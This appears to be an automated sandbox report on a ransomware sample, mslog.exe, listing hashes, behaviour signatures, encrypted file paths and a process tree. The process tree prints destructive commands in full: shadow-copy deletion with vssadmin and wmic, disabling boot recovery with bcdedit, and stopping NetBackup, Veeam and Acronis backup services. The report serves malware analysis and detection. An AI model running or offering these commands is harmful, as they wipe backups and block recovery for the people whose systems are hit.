ff7bc0e26149313a9645b535dc8307ea40b5502d2143314855da9d07d7268daa

Resubmissions

03-10-2021 19:24

211003-x4nq4afeg3 9

01-10-2021 23:31

211001-3h76hadddp 8

Analysis

max time kernel
661s
max time network
403s
platform
windows10_x64
resource
win10v20210408
submitted
03-10-2021 19:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mslog.exe
Size

9.7MB
MD5

f203e938be3fe17ebf389ade9c6b2c9e
SHA1

85c697602efae829e8765a671b36e705a7c96662
SHA256

f0676c64a2f27a02d7947ad41eecfcd9fde5b47ea8fcb9be2a3838cb7dc86128
SHA512

fcb03c204577fc655361610ee27db83eb87a18ed17291055ef0c94de9df5de18e0624972ab4148cc6d3c2ffbcd5e63cc6ceb59292fd468687fac935bafff0030

Score

9^/10

evasion ransomware spyware stealer upx

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1236 bcdedit.exe
376 bcdedit.exe

pid	process
1236	bcdedit.exe
376	bcdedit.exe

Modifies extensions of user files 22 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

mslog.execmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\ImportEnter.raw.back_up	mslog.exe
File opened for modification	C:\Users\Admin\Pictures\RenameGroup.raw.back_up	mslog.exe
File renamed	C:\Users\Admin\Pictures\ResetRead.raw => C:\Users\Admin\Pictures\ResetRead.raw.back_up
File opened for modification	C:\Users\Admin\Pictures\BlockImport.tiff.back_up	mslog.exe
File renamed	C:\Users\Admin\Pictures\DebugTrace.tif => C:\Users\Admin\Pictures\DebugTrace.tif.back_up
File renamed	C:\Users\Admin\Pictures\InstallClear.crw => C:\Users\Admin\Pictures\InstallClear.crw.back_up
File renamed	C:\Users\Admin\Pictures\MoveSave.crw => C:\Users\Admin\Pictures\MoveSave.crw.back_up
File opened for modification	C:\Users\Admin\Pictures\ResetGroup.png.back_up	mslog.exe
File opened for modification	C:\Users\Admin\Pictures\ResetRead.raw.back_up	mslog.exe
File opened for modification	C:\Users\Admin\Pictures\SetDisconnect.png.back_up	mslog.exe
File opened for modification	C:\Users\Admin\Pictures\DebugTrace.tif.back_up	mslog.exe
File renamed	C:\Users\Admin\Pictures\GrantMount.tif => C:\Users\Admin\Pictures\GrantMount.tif.back_up
File renamed	C:\Users\Admin\Pictures\ResetGroup.png => C:\Users\Admin\Pictures\ResetGroup.png.back_up
File renamed	C:\Users\Admin\Pictures\SetDisconnect.png => C:\Users\Admin\Pictures\SetDisconnect.png.back_up
File renamed	C:\Users\Admin\Pictures\BlockImport.tiff => C:\Users\Admin\Pictures\BlockImport.tiff.back_up	cmd.exe
File opened for modification	C:\Users\Admin\Pictures\InstallClear.crw.back_up	mslog.exe
File opened for modification	C:\Users\Admin\Pictures\MoveSave.crw.back_up	mslog.exe
File renamed	C:\Users\Admin\Pictures\RenameGroup.raw => C:\Users\Admin\Pictures\RenameGroup.raw.back_up
File renamed	C:\Users\Admin\Pictures\SearchSelect.tif => C:\Users\Admin\Pictures\SearchSelect.tif.back_up
File opened for modification	C:\Users\Admin\Pictures\SearchSelect.tif.back_up	mslog.exe
File opened for modification	C:\Users\Admin\Pictures\GrantMount.tif.back_up	mslog.exe
File renamed	C:\Users\Admin\Pictures\ImportEnter.raw => C:\Users\Admin\Pictures\ImportEnter.raw.back_up

UPX packed file 48 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI6642\python39.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI6642\python39.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI6642\_ctypes.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI6642\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI6642\libffi-7.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI6642\libffi-7.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI6642\_socket.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI6642\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI6642\select.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI6642\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI6642\pywintypes39.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI6642\pywintypes39.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI6642\_bz2.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI6642\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI6642\_lzma.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI6642\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI6642\win32api.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI6642\win32api.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI6642\pythoncom39.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI6642\pythoncom39.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI6642\_pytransform.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI6642\_pytransform.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI6642\psutil\_psutil_windows.cp39-win_amd64.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI6642\psutil\_psutil_windows.cp39-win_amd64.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23882\python39.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI23882\python39.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23882\_ctypes.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI23882\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23882\libffi-7.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI23882\libffi-7.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23882\_socket.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI23882\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23882\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23882\pywintypes39.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI23882\select.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI23882\pywintypes39.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23882\_bz2.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI23882\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23882\_lzma.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI23882\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23882\win32api.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI23882\win32api.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23882\pythoncom39.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI23882\pythoncom39.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23882\_pytransform.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI23882\_pytransform.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23882\psutil\_psutil_windows.cp39-win_amd64.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI23882\psutil\_psutil_windows.cp39-win_amd64.pyd	upx

Loads dropped DLL 26 IoCs

Processes:

mslog.exemslog.exe

pid	process
424	mslog.exe
424	mslog.exe
424	mslog.exe
424	mslog.exe
424	mslog.exe
424	mslog.exe
424	mslog.exe
424	mslog.exe
424	mslog.exe
424	mslog.exe
424	mslog.exe
424	mslog.exe
424	mslog.exe
3800	mslog.exe
3800	mslog.exe
3800	mslog.exe
3800	mslog.exe
3800	mslog.exe
3800	mslog.exe
3800	mslog.exe
3800	mslog.exe
3800	mslog.exe
3800	mslog.exe
3800	mslog.exe
3800	mslog.exe
3800	mslog.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

mslog.exemslog.exe

pid process

424 mslog.exe
3800 mslog.exe

Drops file in Program Files directory 64 IoCs

Processes:

mslog.exe

description	ioc	process
File opened for modification	C:\Program Files\7-Zip\History.txt.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZY______.PFB.back_up	mslog.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mk.txt.back_up	mslog.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-phn.xrm-ms.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\README_en_US.txt.back_up	mslog.exe
File opened for modification	C:\Program Files\SplitDisconnect.rtf.back_up	mslog.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hr.txt.back_up	mslog.exe
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee90.tlb.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\AdjacencyReport.dotx.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\officemuiset.msi.16.en-us.vreg.dat.back_up	mslog.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pa-in.txt.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d.back_up	mslog.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html.back_up	mslog.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_cs.jar.back_up	mslog.exe
File opened for modification	C:\Program Files\SwitchReset.MOD.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE.back_up	mslog.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets.back_up	mslog.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\LICENSE.back_up	mslog.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME-JAVAFX.txt.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\dcf.x-none.msi.16.x-none.tree.dat.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.back_up	mslog.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css.back_up	mslog.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\index.html.back_up	mslog.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\ext\jaccess.jar.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\en_GB.dic.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.excelmui.msi.16.en-us.xml.back_up	mslog.exe
File opened for modification	C:\Program Files\ClearConvertTo.temp.back_up	mslog.exe
File opened for modification	C:\Program Files\7-Zip\Lang\an.txt.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd.otf.back_up	mslog.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\javafx-src.zip.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT.back_up	mslog.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\include\jawt.h.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\fre\StartMenu_Win8.mp4.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\excelmui.msi.16.en-us.vreg.dat.back_up	mslog.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml.back_up	mslog.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri-Cambria.xml.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-oob.xrm-ms.back_up	mslog.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hy.txt.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT.back_up	mslog.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\MySharePoints.ico.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\office32ww.msi.16.x-none.tree.dat.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\en_US.dic.back_up	mslog.exe
File opened for modification	C:\Program Files\7-Zip\Lang\io.txt.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\Bibliography\BIBFORM.XML.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.dll.config.back_up	mslog.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\VideoLAN Website.url.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntime2019R_PrepidBypass-ppd.xrm-ms.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf.back_up	mslog.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\AUTHORS.txt.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Retail-pl.xrm-ms.back_up	mslog.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\PYCC.pf.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\BloodPressureTracker.xltx.back_up	mslog.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\POWERMAPCLASSIFICATION.DLL.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-It.otf.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Bold.otf.back_up	mslog.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\pkeyconfig-office.xrm-ms.back_up	mslog.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT.back_up	mslog.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist.back_up	mslog.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3292 vssadmin.exe

pid	process
3292	vssadmin.exe

Kills process with taskkill 44 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
244	taskkill.exe
836	taskkill.exe
3380	taskkill.exe
3848	taskkill.exe
3708	taskkill.exe
2796	taskkill.exe
1912	taskkill.exe
376	taskkill.exe
1504	taskkill.exe
1776	taskkill.exe
628	taskkill.exe
3768	taskkill.exe
2480	taskkill.exe
3944	taskkill.exe
1628	taskkill.exe
1036	taskkill.exe
1180	taskkill.exe
712	taskkill.exe
1328	taskkill.exe
1388	taskkill.exe
688	taskkill.exe
1960	taskkill.exe
2700	taskkill.exe
1280	taskkill.exe
2304	taskkill.exe
1660	taskkill.exe
2480	taskkill.exe
1720	taskkill.exe
2540	taskkill.exe
3040	taskkill.exe
3004	taskkill.exe
3736	taskkill.exe
3520	taskkill.exe
1708	taskkill.exe
240	taskkill.exe
1660	taskkill.exe
744	taskkill.exe
3772	taskkill.exe
1176	taskkill.exe
1720	taskkill.exe
1960	taskkill.exe
1168	taskkill.exe
2164	taskkill.exe
488	taskkill.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3044 powershell.exe
3044 powershell.exe
3044 powershell.exe

pid	process
3044	powershell.exe
3044	powershell.exe
3044	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

mslog.exepowershell.exemslog.exewmic.exevssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	424	mslog.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	3800	mslog.exe
Token: SeIncreaseQuotaPrivilege	2796	wmic.exe
Token: SeSecurityPrivilege	2796	wmic.exe
Token: SeTakeOwnershipPrivilege	2796	wmic.exe
Token: SeLoadDriverPrivilege	2796	wmic.exe
Token: SeSystemProfilePrivilege	2796	wmic.exe
Token: SeSystemtimePrivilege	2796	wmic.exe
Token: SeProfSingleProcessPrivilege	2796	wmic.exe
Token: SeIncBasePriorityPrivilege	2796	wmic.exe
Token: SeCreatePagefilePrivilege	2796	wmic.exe
Token: SeBackupPrivilege	2796	wmic.exe
Token: SeRestorePrivilege	2796	wmic.exe
Token: SeShutdownPrivilege	2796	wmic.exe
Token: SeDebugPrivilege	2796	wmic.exe
Token: SeSystemEnvironmentPrivilege	2796	wmic.exe
Token: SeRemoteShutdownPrivilege	2796	wmic.exe
Token: SeUndockPrivilege	2796	wmic.exe
Token: SeManageVolumePrivilege	2796	wmic.exe
Token: 33	2796	wmic.exe
Token: 34	2796	wmic.exe
Token: 35	2796	wmic.exe
Token: 36	2796	wmic.exe
Token: SeIncreaseQuotaPrivilege	2796	wmic.exe
Token: SeSecurityPrivilege	2796	wmic.exe
Token: SeTakeOwnershipPrivilege	2796	wmic.exe
Token: SeLoadDriverPrivilege	2796	wmic.exe
Token: SeSystemProfilePrivilege	2796	wmic.exe
Token: SeSystemtimePrivilege	2796	wmic.exe
Token: SeProfSingleProcessPrivilege	2796	wmic.exe
Token: SeIncBasePriorityPrivilege	2796	wmic.exe
Token: SeCreatePagefilePrivilege	2796	wmic.exe
Token: SeBackupPrivilege	2796	wmic.exe
Token: SeRestorePrivilege	2796	wmic.exe
Token: SeShutdownPrivilege	2796	wmic.exe
Token: SeDebugPrivilege	2796	wmic.exe
Token: SeSystemEnvironmentPrivilege	2796	wmic.exe
Token: SeRemoteShutdownPrivilege	2796	wmic.exe
Token: SeUndockPrivilege	2796	wmic.exe
Token: SeManageVolumePrivilege	2796	wmic.exe
Token: 33	2796	wmic.exe
Token: 34	2796	wmic.exe
Token: 35	2796	wmic.exe
Token: 36	2796	wmic.exe
Token: SeBackupPrivilege	1680	vssvc.exe
Token: SeRestorePrivilege	1680	vssvc.exe
Token: SeAuditPrivilege	1680	vssvc.exe
Token: SeDebugPrivilege	1912	taskkill.exe
Token: SeDebugPrivilege	1708	taskkill.exe
Token: SeDebugPrivilege	2480	taskkill.exe
Token: SeDebugPrivilege	240	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	3944	taskkill.exe
Token: SeDebugPrivilege	2540	taskkill.exe
Token: SeDebugPrivilege	376	taskkill.exe
Token: SeDebugPrivilege	2164	taskkill.exe
Token: SeDebugPrivilege	1628	taskkill.exe
Token: SeDebugPrivilege	1168	taskkill.exe
Token: SeDebugPrivilege	1720	taskkill.exe
Token: SeDebugPrivilege	1776	taskkill.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	2700	taskkill.exe
Token: SeDebugPrivilege	1280	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

mslog.exemslog.exepowershell.exemslog.exemslog.execmd.execmd.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 664 wrote to memory of 424	664	mslog.exe	mslog.exe
PID 664 wrote to memory of 424	664	mslog.exe	mslog.exe
PID 424 wrote to memory of 1408	424	mslog.exe	cmd.exe
PID 424 wrote to memory of 1408	424	mslog.exe	cmd.exe
PID 3044 wrote to memory of 2388	3044	powershell.exe	mslog.exe
PID 3044 wrote to memory of 2388	3044	powershell.exe	mslog.exe
PID 2388 wrote to memory of 3800	2388	mslog.exe	mslog.exe
PID 2388 wrote to memory of 3800	2388	mslog.exe	mslog.exe
PID 3800 wrote to memory of 996	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 996	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 2656	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 2656	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 2796	3800	mslog.exe	wmic.exe
PID 3800 wrote to memory of 2796	3800	mslog.exe	wmic.exe
PID 3800 wrote to memory of 3708	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 3708	3800	mslog.exe	cmd.exe
PID 3708 wrote to memory of 3292	3708	cmd.exe	vssadmin.exe
PID 3708 wrote to memory of 3292	3708	cmd.exe	vssadmin.exe
PID 3800 wrote to memory of 3372	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 3372	3800	mslog.exe	cmd.exe
PID 3372 wrote to memory of 1236	3372	cmd.exe	bcdedit.exe
PID 3372 wrote to memory of 1236	3372	cmd.exe	bcdedit.exe
PID 3372 wrote to memory of 376	3372	cmd.exe	bcdedit.exe
PID 3372 wrote to memory of 376	3372	cmd.exe	bcdedit.exe
PID 3800 wrote to memory of 3168	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 3168	3800	mslog.exe	cmd.exe
PID 3168 wrote to memory of 3040	3168	cmd.exe	sc.exe
PID 3168 wrote to memory of 3040	3168	cmd.exe	sc.exe
PID 3800 wrote to memory of 4048	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 4048	3800	mslog.exe	cmd.exe
PID 4048 wrote to memory of 2716	4048	cmd.exe	net.exe
PID 4048 wrote to memory of 2716	4048	cmd.exe	net.exe
PID 2716 wrote to memory of 1776	2716	net.exe	net1.exe
PID 2716 wrote to memory of 1776	2716	net.exe	net1.exe
PID 3800 wrote to memory of 1704	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 1704	3800	mslog.exe	cmd.exe
PID 1704 wrote to memory of 3380	1704	cmd.exe	net.exe
PID 1704 wrote to memory of 3380	1704	cmd.exe	net.exe
PID 3380 wrote to memory of 2496	3380	net.exe	net1.exe
PID 3380 wrote to memory of 2496	3380	net.exe	net1.exe
PID 3800 wrote to memory of 964	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 964	3800	mslog.exe	cmd.exe
PID 964 wrote to memory of 1716	964	cmd.exe	net.exe
PID 964 wrote to memory of 1716	964	cmd.exe	net.exe
PID 1716 wrote to memory of 420	1716	net.exe	net1.exe
PID 1716 wrote to memory of 420	1716	net.exe	net1.exe
PID 3800 wrote to memory of 3356	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 3356	3800	mslog.exe	cmd.exe
PID 3356 wrote to memory of 1032	3356	cmd.exe	net.exe
PID 3356 wrote to memory of 1032	3356	cmd.exe	net.exe
PID 1032 wrote to memory of 2372	1032	net.exe	net1.exe
PID 1032 wrote to memory of 2372	1032	net.exe	net1.exe
PID 3800 wrote to memory of 2020	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 2020	3800	mslog.exe	cmd.exe
PID 2020 wrote to memory of 4004	2020	cmd.exe	net.exe
PID 2020 wrote to memory of 4004	2020	cmd.exe	net.exe
PID 4004 wrote to memory of 4080	4004	net.exe	net1.exe
PID 4004 wrote to memory of 4080	4004	net.exe	net1.exe
PID 3800 wrote to memory of 2684	3800	mslog.exe	cmd.exe
PID 3800 wrote to memory of 2684	3800	mslog.exe	cmd.exe
PID 2684 wrote to memory of 2864	2684	cmd.exe	net.exe
PID 2684 wrote to memory of 2864	2684	cmd.exe	net.exe
PID 2864 wrote to memory of 252	2864	net.exe	net1.exe
PID 2864 wrote to memory of 252	2864	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\mslog.exe
"C:\Users\Admin\AppData\Local\Temp\mslog.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:664

C:\Users\Admin\AppData\Local\Temp\mslog.exe
"C:\Users\Admin\AppData\Local\Temp\mslog.exe"
2⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
3⤵
PID:1408

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command Set-Location -literalPath 'C:\Users\Admin\AppData\Local\Temp'
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3044

C:\Users\Admin\AppData\Local\Temp\mslog.exe
"C:\Users\Admin\AppData\Local\Temp\mslog.exe" j09f2jf90j2390fj 1 1 0
2⤵
- Suspicious use of WriteProcessMemory
PID:2388

C:\Users\Admin\AppData\Local\Temp\mslog.exe
"C:\Users\Admin\AppData\Local\Temp\mslog.exe" j09f2jf90j2390fj 1 1 0
3⤵
- Modifies extensions of user files
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
4⤵
PID:996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
4⤵
PID:2656

C:\Windows\System32\Wbem\wmic.exe
wmic.exe Shadowcopy Delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2796

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c vssadmin.exe Delete Shadows /all /quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:3708

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:3292

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled No & bcdedit /set {default}
4⤵
- Suspicious use of WriteProcessMemory
PID:3372

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
5⤵
- Modifies boot configuration data using bcdedit
PID:1236

C:\Windows\system32\bcdedit.exe
bcdedit /set {default}
5⤵
- Modifies boot configuration data using bcdedit
PID:376

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c sc config "Netbackup Legacy Network service" start= disabled
4⤵
- Suspicious use of WriteProcessMemory
PID:3168

C:\Windows\system32\sc.exe
sc config "Netbackup Legacy Network service" start= disabled
5⤵
PID:3040

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamDeploySvc /y
4⤵
- Suspicious use of WriteProcessMemory
PID:4048

C:\Windows\system32\net.exe
net stop VeeamDeploySvc /y
5⤵
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
6⤵
PID:1776

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Acronis VSS Provider" /y
4⤵
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\system32\net.exe
net stop "Acronis VSS Provider" /y
5⤵
- Suspicious use of WriteProcessMemory
PID:3380

